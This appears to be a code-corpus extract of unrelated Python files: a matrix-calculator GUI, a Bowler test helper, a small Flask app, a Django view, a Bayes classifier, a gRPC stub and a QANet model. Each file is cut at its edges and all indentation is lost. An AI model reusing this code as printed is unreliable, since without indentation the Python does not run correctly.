M4aEnt.config(validatecommand=(M4aEnt.register(on_validate), '%P'))
M4aEnt.place(x=529, y=316, width=50, height=50)
M4bEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M4bEnt.config(validatecommand=(M4bEnt.register(on_validate), '%P'))
M4bEnt.place(x=609, y=316, width=50, height=50)
M4cEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M4cEnt.config(validatecommand=(M4cEnt.register(on_validate), '%P'))
M4cEnt.place(x=689, y=316, width=50, height=50)
M4dEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center", validate="key")
M4dEnt.config(validatecommand=(M4dEnt.register(on_validate), '%P'))
M4dEnt.place(x=769, y=316, width=50, height=50)
MultiEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center",validate="key")
MultiEnt.config(validatecommand=(MultiEnt.register(on_validate), '%P'))
MultiEnt.place(x=176, y=611, width=50, height=50)
PowEnt = Entry(self, background="white", font="-family {Segoe Print} -size 16", justify="center",validate="key")
PowEnt.config(validatecommand=(PowEnt.register(on_validate), '%P'))
PowEnt.place(x=411, y=611, width=50, height=50)
Result = Label(self, bg='#016738', fg='white', anchor='w', justify="left")
Result.place(x=898, y=50, width=344, height=685)
Result1 = Label(self, bg='#016738', fg='white', anchor='w', justify="right")
Result1.place(x=898, y=50, width=172, height=685)
Result2 = Label(self, bg='#016738', fg='white', anchor='w', justify="left")
Result2.place(x=1070, y=50, width=172, height=685)
def EntLOWER():
Ent = (M1aEnt, M1bEnt, M1cEnt, M1dEnt, M2aEnt, M2bEnt, M2cEnt, M2dEnt, M3aEnt, M3bEnt, M3cEnt, M3dEnt, M4aEnt, M4bEnt, M4cEnt, M4dEnt)
for i in range (16):
Ent[i].lower()
EntLOWER()
def EntLIFT4():
SMPage.DIM = 4
EntLOWER()
Ent = (M1aEnt, M1bEnt, M1cEnt, M1dEnt, M2aEnt, M2bEnt, M2cEnt, M2dEnt, M3aEnt, M3bEnt, M3cEnt, M3dEnt, M4aEnt,M4bEnt, M4cEnt, M4dEnt)
for i in range(16):
Ent[i].lift()
def EntLIFT3():
SMPage.DIM = 3
EntLOWER()
Ent = (M1aEnt, M1bEnt, M1cEnt, M2aEnt, M2bEnt, M2cEnt, M3aEnt, M3bEnt, M3cEnt)
for i in range(9):
Ent[i].lift()
def EntLIFT2():
SMPage.DIM = 2
EntLOWER()
Ent = (M2bEnt, M2cEnt, M3bEnt, M3cEnt)
for i in range(4):
Ent[i].lift()
def SM():
if SMPage.DIM==2:
if not FTest(M2bEnt.get()) or not FTest(M2cEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()):
SMat = SingleMatrix(0, 0)
else:
Mat2D = (float(M2bEnt.get()),float(M2cEnt.get()),float(M3bEnt.get()), float(M3cEnt.get()))
SMat = SingleMatrix(Mat2D, SMPage.DIM)
elif SMPage.DIM==3:
if not FTest(M1aEnt.get()) or not FTest(M1bEnt.get()) or not FTest(M1cEnt.get()) or not FTest(M2aEnt.get()) or not FTest(M2bEnt.get()) or not FTest(M2cEnt.get())\
or not FTest(M3aEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()):
SMat = SingleMatrix(0, 0)
else:
Mat3D = (float(M1aEnt.get()), float(M1bEnt.get()), float(M1cEnt.get()), float(M2aEnt.get()), float(M2bEnt.get()),float(M2cEnt.get()), float(M3aEnt.get()), float(M3bEnt.get()), float(M3cEnt.get()))
SMat = SingleMatrix(Mat3D, SMPage.DIM)
elif SMPage.DIM==4:
if not FTest(M1aEnt.get()) or not FTest(M1bEnt.get()) or not FTest(M1cEnt.get()) or not FTest(M1dEnt.get()) or not FTest(M2aEnt.get()) or not FTest(M2bEnt.get()) or not FTest(M2cEnt.get()) or not FTest(M2dEnt.get())\
or not FTest(M3aEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()) or not FTest(M3dEnt.get()) or not FTest(M4aEnt.get()) or not FTest(M4bEnt.get()) or not FTest(M4cEnt.get()) or not FTest(M4dEnt.get()):
SMat = SingleMatrix(0, 0)
else:
Mat4D = (float(M1aEnt.get()), float(M1bEnt.get()), float(M1cEnt.get()), float(M1dEnt.get()), float(M2aEnt.get()), float(M2bEnt.get()), float(M2cEnt.get()), float(M2dEnt.get()),
float(M3aEnt.get()), float(M3bEnt.get()), float(M3cEnt.get()), float(M3dEnt.get()), float(M4aEnt.get()), float(M4bEnt.get()), float(M4cEnt.get()), float(M4dEnt.get()))
SMat = SingleMatrix(Mat4D, SMPage.DIM)
else:
SMat = SingleMatrix(0, 0)
return SMat
def FTest(x):
return x.lstrip('-').lstrip('+').replace('.', '', 1).isdigit()
def Avalue():
if FTest(MultiEnt.get()):
value = float(MultiEnt.get())
else:
value = 1
return value
def Bvalue():
if FTest(PowEnt.get()):
value = float(PowEnt.get())
else:
value = 1
return value
def SME():
if SMPage.DIM==2:
if not FTest(M2bEnt.get()) or not FTest(M2cEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()):
SMat = DoubleMatrix(0,0,0,0,0)
else:
Mat2D = (float(M2bEnt.get()),float(M2cEnt.get()),float(M3bEnt.get()), float(M3cEnt.get()))
SMat = DoubleMatrix(Mat2D,0,SMPage.DIM,Avalue(),Bvalue())
elif SMPage.DIM==3:
if not FTest(M1aEnt.get()) or not FTest(M1bEnt.get()) or not FTest(M1cEnt.get()) or not FTest(M2aEnt.get()) or not FTest(M2bEnt.get()) or not FTest(M2cEnt.get())\
or not FTest(M3aEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()):
SMat = DoubleMatrix(0,0,0,0,0)
else:
Mat3D = (float(M1aEnt.get()), float(M1bEnt.get()), float(M1cEnt.get()), float(M2aEnt.get()), float(M2bEnt.get()),float(M2cEnt.get()), float(M3aEnt.get()), float(M3bEnt.get()), float(M3cEnt.get()))
SMat = DoubleMatrix(Mat3D,0,SMPage.DIM,Avalue(),Bvalue())
elif SMPage.DIM==4:
if not FTest(M1aEnt.get()) or not FTest(M1bEnt.get()) or not FTest(M1cEnt.get()) or not FTest(M1dEnt.get()) or not FTest(M2aEnt.get()) or not FTest(M2bEnt.get()) or not FTest(M2cEnt.get()) or not FTest(M2dEnt.get())\
or not FTest(M3aEnt.get()) or not FTest(M3bEnt.get()) or not FTest(M3cEnt.get()) or not FTest(M3dEnt.get()) or not FTest(M4aEnt.get()) or not FTest(M4bEnt.get()) or not FTest(M4cEnt.get()) or not FTest(M4dEnt.get()):
SMat = DoubleMatrix(0,0,0,0,0)
else:
Mat4D = (float(M1aEnt.get()), float(M1bEnt.get()), float(M1cEnt.get()), float(M1dEnt.get()), float(M2aEnt.get()), float(M2bEnt.get()), float(M2cEnt.get()), float(M2dEnt.get()),
float(M3aEnt.get()), float(M3bEnt.get()), float(M3cEnt.get()), float(M3dEnt.get()), float(M4aEnt.get()), float(M4bEnt.get()), float(M4cEnt.get()), float(M4dEnt.get()),)
SMat = DoubleMatrix(Mat4D,0,SMPage.DIM,Avalue(),Bvalue())
else:
SMat = DoubleMatrix(0,0,0,0,0)
return SMat
def RESULTlift():
Result.lift()
Result.update()
def DtmAct():
Result.configure(font=("PragmataPro", 14), anchor='n', text=SM().Determinant())
RESULTlift()
def InvAct():
Result1.lift()
Result2.lift()
Result1.configure(font=("Lucida Console", 8), anchor='ne', text=SM().Inverse())
Result1.update()
Result2.configure(font=("Lucida Console", 8), anchor='nw', text=SM().InverseRight())
Result2.update()
def TrpAct():
Result.configure(font=("Lucida Console", 20), anchor='n', text=SM().Transpose())
RESULTlift()
def ScaAct():
Result.configure(font=("Menlo", 17), anchor='n', text=SM().Scalar())
RESULTlift()
def MulAct():
Result.configure(font=("PragmataPro", 18), anchor='n', text=SME().MultiplyBy())
RESULTlift()
def TriAct():
Result.configure(font=("Menlo", 15), anchor='n', text=SM().Triangular())
RESULTlift()
def TrcAct():
Result.configure(font=("Lucida Console", 16), anchor='n', text=SM().Trace())
RESULTlift()
def LUDAct():
Result.configure(font=("Menlo", 15), anchor='n', text=SM().LUDec())
RESULTlift()
def RanAct():
Result.configure(font=("PragmataPro", 15), anchor='n', text=SM().Rank())
RESULTlift()
def PowAct():
Result.configure(font=("PragmataPro", 11), anchor='n', text=SME().PowerBy())
RESULTlift()
def BackAct():
BackS = pygame.mixer.Sound("DisneyBack.wav")
BackS.play()
pygame.mixer.music.load("MenuBG.ogg")
pygame.mixer.music.play(-1)
controller.show_frame("MatrixPage")
def InfoAct():
if SMPage.INFO == False:
SMPage.INFO = True
if SMPage.MUTE == False:
InfoS = pygame.mixer.Sound("DisneyInfoButton.wav")
InfoS.play()
InfoPop.lift()
InfoBtn.lift()
else:
SMPage.INFO = False
InfoPop.lower()
def ResetAct():
if SMPage.MUTE == False:
ClearS = pygame.mixer.Sound("DisneyReset.wav")
ClearS.play()
time.sleep(1)
Ent = (M1aEnt, M1bEnt, M1cEnt, M1dEnt, M2aEnt, M2bEnt, M2cEnt, M2dEnt, M3aEnt, M3bEnt, M3cEnt, M3dEnt, M4aEnt, M4bEnt, M4cEnt, M4dEnt)
for i in range(16):
Ent[i].delete(0, END)
Ent[i].lower()
def MuteAct():
if SMPage.MUTE == True:
SMPage.MUTE = False
pygame.mixer.music.load("MickeyMouse.ogg")
pygame.mixer.music.play(-1)
MuteOff.lower()
else:
SMPage.MUTE = True
pygame.mixer.music.stop()
MuteOff.lift()
def RandAct():
if SMPage.MUTE == False:
RandomS = pygame.mixer.Sound("DisneyRandom.wav")
RandomS.play()
runRandAct()
def runRandAct():
time.sleep(2)
Ent = (M1aEnt, M1bEnt, M1cEnt, M1dEnt, M2aEnt, M2bEnt, M2cEnt, M2dEnt, M3aEnt, M3bEnt, M3cEnt, M3dEnt, M4aEnt,M4bEnt, M4cEnt, M4dEnt)
if SMPage.DIM==2:
for i in range(5,7):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
for i in range(9, 11):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
elif SMPage.DIM==3:
for i in range(0,3):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
for i in range(4, 7):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
for i in range(8, 11):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
elif SMPage.DIM==4:
for i in range(16):
Ent[i].delete(0, END)
Ent[i].insert(1, random.randrange(-9, 10))
else:
SMPage.DIM=0
|
python
|
#!/usr/bin/env python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import functools
import multiprocessing
import sys
import unittest
from io import StringIO
import click
import tempfile
from fissix import pygram, pytree
from fissix.pgen2.driver import Driver
from bowler import Query
from bowler.types import LN, SYMBOL, TOKEN
class BowlerTestCase(unittest.TestCase):
"""Subclass of TestCase that captures stdout and makes it easier to run Bowler."""
def setUp(self):
self.buffer = StringIO()
# Replace the write method instead of stdout so that already-existing
# loggers end up writing here.
sys.stdout._saved_write = sys.stdout.write
sys.stdout.write = self.buffer.write
sys.stdout._saved_isatty = sys.stdout.isatty
sys.stdout.isatty = lambda: False
def tearDown(self):
if hasattr(sys.stdout, "_saved_write"):
sys.stdout.write = sys.stdout._saved_write
del sys.stdout._saved_write
if hasattr(sys.stdout, "_saved_isatty"):
sys.stdout.isatty = sys.stdout._saved_isatty
del sys.stdout._saved_isatty
def _formatMessage(self, msg1, msg2):
stdout_text = self.buffer.getvalue()
msg = msg1 or msg2
if stdout_text:
msg += "\n"
msg += "-" * 20 + "< captured stdout >" + "-" * 20 + "\n"
msg += stdout_text + "\n"
msg += "-" * 20 + "< end stdout >" + "-" * 20 + "\n"
return msg
def run_bowler_modifier(
self,
input_text,
selector=None,
modifier=None,
selector_func=None,
modifier_func=None,
in_process=True,
query_func=None,
):
"""Returns the modified text."""
if not (selector or selector_func or query_func):
raise ValueError("Pass selector")
if not (modifier or modifier_func or query_func):
raise ValueError("Pass modifier")
exception_queue = multiprocessing.Queue()
def store_exceptions_on(func):
@functools.wraps(func)
def inner(node, capture, filename):
# When in_process=False, this runs in another process. See notes below.
try:
return func(node, capture, filename)
except Exception as e:
exception_queue.put(e)
return inner
def default_query_func(files):
if selector_func:
q = selector_func(files)
else:
q = Query(files).select(selector)
if modifier_func:
q = modifier_func(q)
else:
q = q.modify(modifier)
return q
if query_func is None:
query_func = default_query_func
with tempfile.NamedTemporaryFile(mode="w", suffix=".py", delete=False) as f:
# TODO: I'm almost certain this will not work on Windows, since
# NamedTemporaryFile has it already open for writing. Consider
# using mktemp directly?
f.write(input_text + "\n")
f.close()
query = query_func([f.name])
assert query is not None, "Remember to return the Query"
assert query.retcode is None, "Return before calling .execute"
assert len(query.transforms) == 1, "TODO: Support multiple"
for i in range(len(query.current.callbacks)):
query.current.callbacks[i] = store_exceptions_on(
query.current.callbacks[i]
)
# We require the in_process parameter in order to record coverage properly,
# but it also helps in bubbling exceptions and letting tests read state set
# by modifiers.
query.execute(
interactive=False, write=True, silent=False, in_process=in_process
)
# In the case of in_process=False (mirroring normal use of the tool) we use
# the queue to ship back exceptions from local_process, which can actually
# fail the test. Normally exceptions in modifiers are not printed
# at all unless you pass --debug, and even then you don't get the
# traceback.
# See https://github.com/facebookincubator/Bowler/issues/63
if not exception_queue.empty():
raise AssertionError from exception_queue.get()
with open(f.name, "r") as fr:
return fr.read().rstrip()
def run_bowler_modifiers(
self, cases, selector=None, modifier=None, query_func=None
):
for input, expected in cases:
with self.subTest(input):
output = self.run_bowler_modifier(
input, selector, modifier, query_func=query_func
)
self.assertMultiLineEqual(expected, output)
def parse_line(self, source: str) -> LN:
grammar = pygram.python_grammar_no_print_statement
driver = Driver(grammar, convert=pytree.convert)
# Skip file_input, simple_stmt
return driver.parse_string(source + "\n").children[0].children[0]
class BowlerTestCaseTest(BowlerTestCase):
def test_stdout_capture(self):
print("hi")
print("there")
self.assertIn("hi\n", self.buffer.getvalue())
def test_stdout_click_no_colors(self):
# This tests that we patched isatty correctly.
click.echo(click.style("hi", fg="red", bold=True))
self.assertEqual("hi\n", self.buffer.getvalue())
def test_run_bowler_modifier(self):
input = "x=a*b"
selector = "term< any op='*' any >"
def modifier(node, capture, filename):
capture["op"].value = "/"
capture["op"].changed()
output = self.run_bowler_modifier(input, selector, modifier)
self.assertEqual("x=a/b", output)
def test_run_bowler_modifier_parse_error(self):
input = " if x:\n bad"
selector = "any"
output = self.run_bowler_modifier(input, selector, lambda *args: None)
self.assertFalse("None" in output)
def test_run_bowler_modifier_query_func(self):
input = "x=a*b"
selector = "term< any op='*' any >"
def modifier(node, capture, filename):
capture["op"].value = "/"
capture["op"].changed()
def query_func(arg):
return Query(arg).select(selector).modify(modifier)
output = self.run_bowler_modifier(input, query_func=query_func)
self.assertEqual("x=a/b", output)
def test_run_bowler_modifier_modifier_func(self):
input = "x=a*b"
selector = "term< any op='*' any >"
def selector_func(arg):
return Query(arg).select(selector)
def modifier(node, capture, filename):
capture["op"].value = "/"
capture["op"].changed()
def modifier_func(q):
return q.modify(modifier)
output = self.run_bowler_modifier(
input, selector_func=selector_func, modifier_func=modifier_func
)
self.assertEqual("x=a/b", output)
def test_run_bowler_modifier_ferries_exception(self):
input = "x=a*b"
selector = "term< any op='*' any >"
def modifier(not_enough_args):
pass
# Should work in both modes
self.assertRaises(
AssertionError,
lambda: self.run_bowler_modifier(
input, selector, modifier, in_process=False
),
)
self.assertRaises(
AssertionError,
lambda: self.run_bowler_modifier(
input, selector, modifier, in_process=True
),
)
def test_parse_line_leaf(self):
input = "2.5"
tree = self.parse_line(input)
self.assertEqual(TOKEN.NUMBER, tree.type)
self.assertEqual("2.5", tree.value)
def test_parse_line_node(self):
input = "x = (y+1)"
tree = self.parse_line(input)
self.assertEqual(SYMBOL.expr_stmt, tree.type)
self.assertEqual(TOKEN.NAME, tree.children[0].type)
self.assertEqual(TOKEN.EQUAL, tree.children[1].type)
self.assertEqual(SYMBOL.atom, tree.children[2].type)
self.assertEqual("x", tree.children[0].value)
|
python
|
import random
import json
import requests
from flask import Flask, request, render_template
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def home():
rcomb = request.args.get('rcomb','http://appcombiner:5003/rcomb')
return render_template('index.html', rcomb=str(rcomb))
if __name__=='__main__':
app.run(host='0.0.0.0', port=5000, debug=True)
|
python
|
from django.urls import reverse
from django.views import generic
from . import forms
class KindeditorFormView(generic.FormView):
form_class = forms.KindeditorForm
template_name = "form.html"
def get_success_url(self):
return reverse("kindeditor-form")
kindeditor_form_view = KindeditorFormView.as_view()
|
python
|
#!/usr/bin/env python
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Michael A.G. Aivazis
# California Institute of Technology
# (C) 1998-2003 All Rights Reserved
#
# <LicenseText>
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from __future__ import absolute_import
from builtins import str
from .Property import Property
class String(Property):
def __init__(
self, name, default="", public=None, validator=None, tip="", doc=""
):
super(String, self).__init__(
name, default, public, validator, tip, doc
)
self.type = "str"
return
def _cast(self, value):
return str(value)
# version
__id__ = "$Id$"
# End of file
|
python
|
from pathlib import Path
from typing import List
def get_asset(name: str) -> Path:
try:
path = next(Path(__file__).parent.rglob(name))
except StopIteration:
raise FileNotFoundError(name)
return path
def find_asset(name: str) -> List[Path]:
paths = list(Path(__file__).parent.rglob(name))
if not paths:
raise FileNotFoundError(name)
return paths
|
python
|
import pandas as pd
import numpy as np
from scipy.stats import multivariate_normal
from sklearn.metrics import accuracy_score
def bayesiano(classes,x_train,y_train,x_test,y_test):
#### Realiza a classificacao ####
# Matriz que armazena as probabilidades para cada classe
P = pd.DataFrame(data=np.zeros((x_train.shape[0], len(classes))), columns = classes)
Pc = np.zeros(len(classes)) # Armaze a fracao de elementos em cada classe
for i in np.arange(0, len(classes)): # Para cada classe
elements = tuple(np.where(y_train == classes[i])) # elmentos na classe i
Pc[i] = len(elements)/len(y_train) # Probabilidade pertencer a classe i
Z = x_train[elements,:][0] # Elementos no conjunto de treinamento
m = np.mean(Z, axis = 0) # Vetor media
cv = np.cov(np.transpose(Z)) # Matriz de covariancia
for j in np.arange(0,x_test.shape[0]): # para cada observacao no conjunto de teste
x = x_test[j,:]
# calcula a probabilidade pertencer a cada classe
pj = multivariate_normal.pdf(x, mean=m, cov=cv, allow_singular=True)
P[classes[i]][j] = pj*Pc[i]
y_pred = [] # Vetor com as classes preditas
for i in np.arange(0, x_test.shape[0]):
c = np.argmax(np.array(P.iloc[[i]]))
y_pred.append(classes[c])
#y_pred = np.array(y_pred, dtype=str)
# calcula a acuracia
#score = accuracy_score(y_pred, y_test)
return y_test,y_pred
|
python
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.ads.google_ads.v3.proto.resources import bidding_strategy_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_resources_dot_bidding__strategy__pb2
from google.ads.google_ads.v3.proto.services import bidding_strategy_service_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2
class BiddingStrategyServiceStub(object):
"""Proto file describing the Bidding Strategy service.
Service to manage bidding strategies.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetBiddingStrategy = channel.unary_unary(
'/google.ads.googleads.v3.services.BiddingStrategyService/GetBiddingStrategy',
request_serializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.GetBiddingStrategyRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_resources_dot_bidding__strategy__pb2.BiddingStrategy.FromString,
)
self.MutateBiddingStrategies = channel.unary_unary(
'/google.ads.googleads.v3.services.BiddingStrategyService/MutateBiddingStrategies',
request_serializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.MutateBiddingStrategiesRequest.SerializeToString,
response_deserializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.MutateBiddingStrategiesResponse.FromString,
)
class BiddingStrategyServiceServicer(object):
"""Proto file describing the Bidding Strategy service.
Service to manage bidding strategies.
"""
def GetBiddingStrategy(self, request, context):
"""Returns the requested bidding strategy in full detail.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def MutateBiddingStrategies(self, request, context):
"""Creates, updates, or removes bidding strategies. Operation statuses are
returned.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_BiddingStrategyServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetBiddingStrategy': grpc.unary_unary_rpc_method_handler(
servicer.GetBiddingStrategy,
request_deserializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.GetBiddingStrategyRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_resources_dot_bidding__strategy__pb2.BiddingStrategy.SerializeToString,
),
'MutateBiddingStrategies': grpc.unary_unary_rpc_method_handler(
servicer.MutateBiddingStrategies,
request_deserializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.MutateBiddingStrategiesRequest.FromString,
response_serializer=google_dot_ads_dot_googleads__v3_dot_proto_dot_services_dot_bidding__strategy__service__pb2.MutateBiddingStrategiesResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'google.ads.googleads.v3.services.BiddingStrategyService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
python
|
# coding: utf-8
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=
r"""
This file contains QANet model and all used layers.
"""
import math
import mxnet as mx
from mxnet import gluon, nd
from mxnet.initializer import MSRAPrelu, Normal, Uniform, Xavier
from gluonnlp.initializer import HighwayBias
from gluonnlp.model import (ConvolutionalEncoder, DotProductAttentionCell,
Highway, MultiHeadAttentionCell)
from config import opt
from util import mask_logits
class MySoftmaxCrossEntropy(gluon.loss.Loss):
r"""Caluate the sum of softmax cross entropy.
Reference:
http://mxnet.incubator.apache.org/api/python/gluon/loss.html#mxnet.gluon.loss.SoftmaxCrossEntropyLoss
Parameters
----------
axis : int, default -1
The axis to sum over when computing softmax and entropy.
sparse_label : bool, default True
Whether label is an integer array instead of probalbility distribution.
from_logits : bool, default False
Whether input is a log probability (usually from log_softmax) instead of
unnormalized numbers.
weight : float or None
Global scalar weight for loss.
batch_axis : int, default 0
The axis that represents mini-batch.
"""
def __init__(self, axis=-1, sparse_label=True, from_logits=False, weight=None, batch_axis=0,
**kwargs):
super(MySoftmaxCrossEntropy, self).__init__(
weight, batch_axis, **kwargs)
self.loss = gluon.loss.SoftmaxCrossEntropyLoss(axis=axis,
sparse_label=sparse_label,
from_logits=from_logits,
weight=weight,
batch_axis=batch_axis)
def forward(self, predict_begin, predict_end, label_begin, label_end):
r"""Implement forward computation.
Parameters
-----------
predict_begin : NDArray
Predicted probability distribution of answer begin position,
input tensor with shape `(batch_size, sequence_length)`
predict_end : NDArray
Predicted probability distribution of answer end position,
input tensor with shape `(batch_size, sequence_length)`
label_begin : NDArray
True label of the answer begin position,
input tensor with shape `(batch_size, )`
label_end : NDArray
True label of the answer end position,
input tensor with shape `(batch_size, )`
Returns
--------
out: NDArray
output tensor with shape `(batch_size, )`
"""
return self.loss(predict_begin, label_begin) + self.loss(predict_end, label_end)
class QANet(gluon.HybridBlock):
r"""QANet model.
We implemented the QANet proposed in the following work::
@article{DBLP:journals/corr/abs-1804-09541,
author = {Adams Wei Yu and
David Dohan and
Minh{-}Thang Luong and
Rui Zhao and
Kai Chen and
Mohammad Norouzi and
Quoc V. Le},
title = {QANet: Combining Local Convolution with Global Self-Attention for
Reading Comprehension},
year = {2018},
url = {http://arxiv.org/abs/1804.09541}
}
"""
def __init__(self, **kwargs):
super(QANet, self).__init__(**kwargs)
with self.name_scope():
self.flatten = gluon.nn.Flatten()
self.dropout = gluon.nn.Dropout(opt.layers_dropout)
self.char_conv = ConvolutionalEncoder(
embed_size=opt.char_emb_dim,
num_filters=opt.char_conv_filters,
ngram_filter_sizes=opt.char_conv_ngrams,
conv_layer_activation=None,
num_highway=0
)
self.highway = gluon.nn.HybridSequential()
with self.highway.name_scope():
self.highway.add(
gluon.nn.Dense(
units=opt.emb_encoder_conv_channels,
flatten=False,
use_bias=False,
weight_initializer=Xavier()
)
)
self.highway.add(
Highway(
input_size=opt.emb_encoder_conv_channels,
num_layers=opt.highway_layers,
activation='relu',
highway_bias=HighwayBias(
nonlinear_transform_bias=0.0,
transform_gate_bias=0.0
)
)
)
self.word_emb = gluon.nn.HybridSequential()
with self.word_emb.name_scope():
self.word_emb.add(
gluon.nn.Embedding(
input_dim=opt.word_corpus,
output_dim=opt.word_emb_dim
)
)
self.word_emb.add(
gluon.nn.Dropout(rate=opt.word_emb_dropout)
)
self.char_emb = gluon.nn.HybridSequential()
with self.char_emb.name_scope():
self.char_emb.add(
gluon.nn.Embedding(
input_dim=opt.character_corpus,
output_dim=opt.char_emb_dim,
weight_initializer=Normal(sigma=0.1)
)
)
self.char_emb.add(
gluon.nn.Dropout(rate=opt.char_emb_dropout)
)
with self.name_scope():
self.emb_encoder = Encoder(
kernel_size=opt.emb_encoder_conv_kernerl_size,
num_filters=opt.emb_encoder_conv_channels,
conv_layers=opt.emb_encoder_num_conv_layers,
num_heads=opt.emb_encoder_num_head,
num_blocks=opt.emb_encoder_num_block
)
self.project = gluon.nn.Dense(
units=opt.emb_encoder_conv_channels,
flatten=False,
use_bias=False,
weight_initializer=Xavier()
)
with self.name_scope():
self.co_attention = CoAttention()
with self.name_scope():
self.model_encoder = Encoder(
kernel_size=opt.model_encoder_conv_kernel_size,
num_filters=opt.model_encoder_conv_channels,
conv_layers=opt.model_encoder_conv_layers,
num_heads=opt.model_encoder_num_head,
num_blocks=opt.model_encoder_num_block
)
with self.name_scope():
self.predict_begin = gluon.nn.Dense(
units=1,
use_bias=True,
flatten=False,
weight_initializer=Xavier(
rnd_type='uniform', factor_type='in', magnitude=1),
bias_initializer=Uniform(1.0/opt.model_encoder_conv_channels)
)
self.predict_end = gluon.nn.Dense(
units=1,
use_bias=True,
flatten=False,
weight_initializer=Xavier(
rnd_type='uniform', factor_type='in', magnitude=1),
bias_initializer=Uniform(1.0/opt.model_encoder_conv_channels)
)
def hybrid_forward(self, F, context, query, context_char, query_char,
y_begin, y_end):
r"""Implement forward computation.
Parameters
-----------
context : NDArray
input tensor with shape `(batch_size, context_sequence_length)`
query : NDArray
input tensor with shape `(batch_size, query_sequence_length)`
context_char : NDArray
input tensor with shape `(batch_size, context_sequence_length, num_char_per_word)`
query_char : NDArray
input tensor with shape `(batch_size, query_sequence_length, num_char_per_word)`
y_begin : NDArray
input tensor with shape `(batch_size, )`
y_end : NDArray
input tensor with shape `(batch_size, )`
Returns
--------
predicted_begin : NDArray
output tensor with shape `(batch_size, context_sequence_length)`
predicted_end : NDArray
output tensor with shape `(batch_size, context_sequence_length)`
"""
(batch, _) = context.shape
context_mask = context > 0
query_mask = query > 0
context_max_len = int(context_mask.sum(axis=1).max().asscalar())
query_max_len = int(query_mask.sum(axis=1).max().asscalar())
context = F.slice(context, begin=(0, 0), end=(batch, context_max_len))
query = F.slice(query, begin=(0, 0), end=(batch, query_max_len))
context_mask = F.slice(
context_mask,
begin=(0, 0),
end=(batch, context_max_len)
)
query_mask = F.slice(
query_mask,
begin=(0, 0),
end=(batch, query_max_len)
)
context_char = F.slice(
context_char,
begin=(0, 0, 0),
end=(batch, context_max_len, opt.max_character_per_word)
)
query_char = F.slice(
query_char,
begin=(0, 0, 0),
end=(batch, query_max_len, opt.max_character_per_word)
)
# word embedding
context_word_emb = self.word_emb(context)
query_word_emb = self.word_emb(query)
# char embedding
context_char_flat = self.flatten(context_char)
query_char_flat = self.flatten(query_char)
context_char_emb = self.char_emb(context_char_flat)
query_char_emb = self.char_emb(query_char_flat)
context_char_emb = F.reshape(
context_char_emb,
shape=(
batch*context_max_len,
opt.max_character_per_word,
opt.char_emb_dim
)
)
query_char_emb = F.reshape(
query_char_emb,
shape=(
batch*query_max_len,
opt.max_character_per_word,
opt.char_emb_dim
)
)
context_char_emb = F.transpose(context_char_emb, axes=(1, 0, 2))
query_char_emb = F.transpose(query_char_emb, axes=(1, 0, 2))
context_char_emb = self.char_conv(context_char_emb)
query_char_emb = self.char_conv(query_char_emb)
context_char_emb = F.reshape(
context_char_emb,
shape=(
batch,
context_max_len,
context_char_emb.shape[-1]
)
)
query_char_emb = F.reshape(
query_char_emb,
shape=(
batch,
query_max_len,
query_char_emb.shape[-1]
)
)
# concat word and char embedding
context_concat = F.concat(context_word_emb, context_char_emb, dim=-1)
